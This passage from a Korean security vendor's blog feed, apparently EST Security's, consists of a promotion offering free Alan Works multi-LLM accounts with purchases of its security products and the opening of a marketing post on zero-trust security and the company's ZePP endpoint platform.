data-origin-height=&quot;1812&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Frame 35.png&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;70&quot;&gt;&lt;a href=&quot;https://bit.ly/3MPfqZ1&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/CGvSu/dJMb99LJFau/LbphdEKcvzYqRaNVHkdNfK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FCGvSu%2FdJMb99LJFau%2FLbphdEKcvzYqRaNVHkdNfK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;480&quot; height=&quot;70&quot; data-filename=&quot;Frame 35.png&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;70&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;보안 솔루션 도입 시, Alan Works 계정 무료 제공&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이번 프로모션은 알약, 알툴즈, 문서중앙화 솔루션 신규 도입 고객을 대상으로 진행됩니다. 해당 솔루션을 도입하신 고객께는 도입 금액에 따라 Alan Works 계정을 무료로 제공해 드립니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt; &amp;nbsp;프로모션 안내&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;프로모션 대상&lt;/b&gt;: 알약 / 알툴즈 / 문서중앙화 솔루션 신규 도입 고객&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;혜택 내용&lt;/b&gt;: Alan Works 계정 무료 제공 (도입 금액 200만원당 1계정 제공)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;프로모션 기간&lt;/b&gt;: ~ 2025년 12월 31일&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;상담 신청하기&lt;/b&gt;: &lt;a href=&quot;https://bit.ly/3MPfqZ1&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;바로가기(Click)&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;※ 본 프로모션은 한정 수량으로 조기 종료될 수 있습니다.&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;  Alan Works란 무엇인가요?&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;a href=&quot;https://bit.ly/4pP4xVE&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;b&gt;Alan Works&lt;/b&gt;&lt;/a&gt;는 기업 환경에 최적화된 &lt;b&gt;안전한 멀티 LLM 기반 AI 업무 플랫폼&lt;/b&gt;입니다. 개인용 AI 서비스와 달리, 기업 데이터 보호와 관리 기능을 기본 전제로 설계되어 보안 리스크를 최소화하면서도 업무 생산성을 극대화할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;02_ALAN.png&quot; data-origin-width=&quot;1260&quot; data-origin-height=&quot;1308&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/csjMLN/dJMcagqyJWP/4qzKRkbobppcET51e9wQC1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/csjMLN/dJMcagqyJWP/4qzKRkbobppcET51e9wQC1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/csjMLN/dJMcagqyJWP/4qzKRkbobppcET51e9wQC1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcsjMLN%2FdJMcagqyJWP%2F4qzKRkbobppcET51e9wQC1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1260&quot; height=&quot;1308&quot; data-filename=&quot;02_ALAN.png&quot; data-origin-width=&quot;1260&quot; data-origin-height=&quot;1308&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;✔&amp;nbsp;&lt;b&gt;다양한&amp;nbsp;최신&amp;nbsp;LLM을&amp;nbsp;한&amp;nbsp;번에&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;ChatGPT,&amp;nbsp;Claude,&amp;nbsp;Gemini&amp;nbsp;등&amp;nbsp;15종&amp;nbsp;이상의&amp;nbsp;최신&amp;nbsp;LLM을&amp;nbsp;하나의&amp;nbsp;플랫폼에서&amp;nbsp;사용할&amp;nbsp;수&amp;nbsp;있어,&amp;nbsp;목적에&amp;nbsp;따라&amp;nbsp;가장&amp;nbsp;적합한&amp;nbsp;모델을&amp;nbsp;선택할&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;✔ 멀티 모델 비교 활용&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;하나의 질문에 대해 여러 LLM의 답변을 동시에 비교해, 가장 정확하고 효율적인 결과를 빠르게 도출할 수 있습니다. &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;✔ &lt;b&gt;프롬프트 라이브러리 제공&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;직무&amp;middot;업무 분야별로 최적화된 프롬프트를 제공해, AI 활용 경험이 많지 않은 사용자도 전문가 수준의 결과물을 쉽게 얻을 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;✔ KPI &amp;amp; 리포트 시스템&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;사용자&amp;middot;조직별 사용량, 비용, 품질 지표를 자동으로 분석해 월간 리포트 형태로 제공, AI 활용 현황을 체계적으로 관리할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Frame 36.png&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;70&quot;&gt;&lt;a href=&quot;https://bit.ly/4pP4xVE&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bvgoWa/dJMcabCMMNz/suKZjeITm6iyOT5DWHk5l1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbvgoWa%2FdJMcabCMMNz%2FsuKZjeITm6iyOT5DWHk5l1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;480&quot; height=&quot;70&quot; data-filename=&quot;Frame 36.png&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;70&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;업무 효율 2배, 지금 바로 시작하세요!&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안은 강화하고, 업무 효율은 높이고, AI 활용까지 한 번에!&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이번 프로모션은 기업 보안 도입을 고민 중인 조직에게 실질적인 가치를 제공하는 기회입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;✔ &lt;b&gt;보안 솔루션 도입&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;✔ Alan Works 계정 무료 제공&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;✔ 안전한 생성형 AI 업무 환경 구축&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;지금 바로 이스트시큐리티와 함께, &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안과 AI 혁신을 동시에 시작해 보시기 바랍니다!&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Frame 35.png&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;70&quot;&gt;&lt;a href=&quot;https://bit.ly/3MPfqZ1&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/CGvSu/dJMb99LJFau/LbphdEKcvzYqRaNVHkdNfK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FCGvSu%2FdJMb99LJFau%2FLbphdEKcvzYqRaNVHkdNfK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;480&quot; height=&quot;70&quot; data-filename=&quot;Frame 35.png&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;70&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식/이벤트</category>
      <category>기업보안</category>
      <category>기업보안솔루션</category>
      <category>기업용LLM</category>
      <category>멀티llm</category>
      <category>이스트소프트</category>
      <category>이스트시큐리티</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5692</guid>
      <comments>https://alyacofficialblog.tistory.com/5692#entry5692comment</comments>
      <pubDate>Mon, 22 Dec 2025 15:07:15 +0900</pubDate>
    </item>
    <item>
      <title>경계 없는 시대, 왜 지금 &amp;lsquo;제로트러스트&amp;rsquo;인가? - 엔드포인트 중심 보안으로 다시 설계하는 기업 보안</title>
      <link>https://alyacofficialblog.tistory.com/5691</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 국내외에서 대규모 개인정보 유출 사고가 잇따라 발생하며 기업 보안 환경에 심각한 경고 신호가 켜지고 있습니다. 대형 이커머스 플랫폼부터 공공기관, 금융사까지 산업 전반에서 유출 사고가 이어지고 있으며, 이름&amp;middot;연락처와 같은 정보도 스미싱, 계정 탈취, 내부 사칭 이메일(BEC) 등 2차 공격으로 빠르게 악용되고 있습니다. 여기에 재택근무, 클라우드, SaaS 기반 업무가 일상화되면서 업무 환경은 더욱 확장되었고, 기존처럼 회사 네트워크 경계만 지키는 방식은 더 이상 유효하지 않게 되었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;한국인터넷진흥원의 분석에 따르면 최근 랜섬웨어 공격의 95%가 내부망에서의 횡적 이동(Lateral Movement)을 통해 확산되는 것으로 나타났습니다. 이는 한 번 내부로 침입이 발생하면 피해가 전사적으로 확대될 수 있음을 의미하며, 기업 보안 운영 방식의 근본적인 재정비가 필요한 시점임을 보여줍니다. 이러한 변화 속에서 주목받고 있는 보안 패러다임이 바로 &lt;span&gt;&lt;b&gt;제로트러스트(Zero Trust)&lt;/b&gt;&lt;/span&gt; 입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384076.png&quot; data-origin-width=&quot;1200&quot; data-origin-height=&quot;800&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Jtjr0/dJMcab3MVnX/WTyfrddUWwb6nY5JuMlk30/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Jtjr0/dJMcab3MVnX/WTyfrddUWwb6nY5JuMlk30/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Jtjr0/dJMcab3MVnX/WTyfrddUWwb6nY5JuMlk30/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FJtjr0%2FdJMcab3MVnX%2FWTyfrddUWwb6nY5JuMlk30%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1200&quot; height=&quot;800&quot; data-filename=&quot;Group 2034384076.png&quot; data-origin-width=&quot;1200&quot; data-origin-height=&quot;800&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h2 data-ke-size=&quot;size26&quot;&gt;&amp;nbsp;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;제로트러스트란 무엇인가?&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;제로트러스트의 원칙은 매우 단순합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&amp;ldquo;아무도 신뢰하지 말고, 모든 접근을 검증하라.&amp;rdquo;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;기존 보안이 내부 네트워크에 들어오면 신뢰를 전제로 운영되었다면, 제로트러스트는 사용자&amp;middot;기기&amp;middot;네트워크&amp;middot;애플리케이션에 대해 지속적으로 검증하고, 필요한 최소한의 권한만을 허용합니다. 이를 통해 내부 확산을 사전에 차단하고, 보다 정교한 접근 통제가 가능해집니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;이스트시큐리티 제로트러스트 통합 플랫폼 &amp;lsquo;ZePP'&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Left.png&quot; data-origin-width=&quot;1920&quot; data-origin-height=&quot;1696&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bZKcaN/dJMcabJzduU/jMLFHidLKil2p7spp7t0V0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bZKcaN/dJMcabJzduU/jMLFHidLKil2p7spp7t0V0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bZKcaN/dJMcabJzduU/jMLFHidLKil2p7spp7t0V0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbZKcaN%2FdJMcabJzduU%2FjMLFHidLKil2p7spp7t0V0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1920&quot; height=&quot;1696&quot; data-filename=&quot;Left.png&quot; data-origin-width=&quot;1920&quot; data-origin-height=&quot;1696&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;이스트시큐리티는 국내 1,600만 사용자 기반으로 검증된 알약 엔드포인트 보안 기술에 제로트러스트 아키텍처를 결합해 엔드포인트 중심 제로트러스트 통합 보안 플랫폼 &amp;lsquo;알약 ZePP&amp;rsquo;을 제공합니다. 알약 ZePP은 네트워크 접근제어, 사용자 인증, 엔드포인트 보안, 통합 보안 정책 관리를 하나의 플랫폼으로 구성한 것이 특징입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;특히 알약 ZePP은 &lt;u&gt;&lt;span&gt;NIST SP 800-207(Zero Trust Architecture)&lt;/span&gt;&lt;/u&gt; 기준을 기반으로 설계되었으며, 2024년 KISA 통합보안모델 개발 시범사업과 2025년 제로트러스트 도입 시범사업을 통해 실제 환경에서 구조적 안정성과 운영 가능성을 검증했습니다. 단일 솔루션이 아닌, 기업 보안 환경 전반을 고려한 제로트러스트 기반 통합 구조라는 점에서 차별성을 갖습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;알약 ZePP은 사용자와 기기의 상태, 보안 정책 준수 여부를 종합해 &lt;span&gt;신뢰 점수 기반 접근 제어&lt;/span&gt;를 수행하며, 보안 상태 변화에 따라 접근 권한을 유연하게 조정할 수 있도록 설계되었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;알약 ZePP 주요 기능 한눈에 보기&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1202&quot; data-origin-height=&quot;523&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/T3Bxt/dJMcajnewx5/dkP4ABmIgdKF3iYw6AKXq1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/T3Bxt/dJMcajnewx5/dkP4ABmIgdKF3iYw6AKXq1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/T3Bxt/dJMcajnewx5/dkP4ABmIgdKF3iYw6AKXq1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FT3Bxt%2FdJMcajnewx5%2FdkP4ABmIgdKF3iYw6AKXq1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1202&quot; height=&quot;523&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1202&quot; data-origin-height=&quot;523&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
